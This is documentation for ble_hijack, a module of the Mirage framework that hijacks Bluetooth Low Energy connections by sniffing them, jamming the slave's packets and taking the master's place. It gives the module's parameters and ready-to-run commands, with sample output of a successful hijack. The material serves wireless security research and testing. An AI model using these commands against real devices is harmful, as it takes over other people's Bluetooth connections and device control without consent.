ble_hijack

Presentation

ble_hijack implements the active attack provided by BTLEJack : it allows to hijack a specific connection. This attack sniffs an established connection, synchronizes to it and jams the packet emitted by the slave. As a consequence, if the master reachs its timeout value, it disconnects from the slave device and the attacker is able to communicate with the slave device instead of him. This module allows to hijack a new connection (setting the input parameter HIJACKING_MODE to “newConnections”) or an established connection (setting the input parameter HIJACKING_MODE to “existingConnections”. Some additional parameters can be provided, allowing to “help” the module to find the right target (TARGET for a new connection, ACCESS_ADDRESS, CRC_INIT and CHANNEL_MAP for an existing connection). This module needs ble_sniff, and cannot be used alone. Indeed, when the connection is hijacked, the module terminates its execution, allowing to run another module, such as ble_master or ble_discover. It can be used similarly to the module ble_connect.

Warning

This attack is sometimes unstable, and may require multiple attempts. This module is experimental and is only provided as a proof of concept.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

microbit0

microbitX

Primary interface to use

INTERFACEA

microbitX

Optionnal additional interface

INTERFACEB

microbitX

Optionnal additional interface

TARGET

<BD address>

Target address

CHANNEL

37

37|38|39

Communication channel to observe

HIJACKING_MODE

newConnections

newConnections|existingConnections

Hijacking strategy

ACCESS_ADDRESS

0xYYYY

Access address for an existing connection

CRC_INIT

0xYYYYYY

CRCInit for an existing connection

CHANNEL_MAP

0xYYYYYYYYYY

Channel Map for an existing connection

Output parameters

Name

Possible values

Description

INTERFACE

microbitX

Primary interface used

Usage

Hijacking a new connection

If you want to easily hijack a new connection, please sets “newConnections” as value of the input parameter HIJACKING_MODE :

$ sudo mirage "ble_hijack|ble_master" ble_hijack1.HIJACKING_MODE=newConnections
[INFO] Module ble_hijack loaded !
[INFO] Module ble_master loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x88262126     │ 0xe12e70 │ 0x1e007fffff │ 36           │ 6             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Recovering Hop Interval ...
[SUCCESS] Hop Interval successfully recovered : 36
[INFO] Recovering Hop Increment ...
[SUCCESS] Hop Increment successfully recovered : 6
[INFO] All parameters recovered, following connection ...
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x88262126     │ 0xe12e70 │ 0x1e007fffff │ 36           │ 6             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Hijacking in progress ...
[MASTER|0x88262126]:

Then, you can use the ble_master, exactly as if you used it alone or with ble_connect.

Hijacking an existing connection

Similarly, if you want to hijack an existing connection, please sets “existingConnections” as value of the input parameter HIJACKING_MODE :

$ sudo mirage "ble_hijack|ble_master" ble_hijack1.HIJACKING_MODE=existingConnections

Then, the execution is quite similar to the previously described one.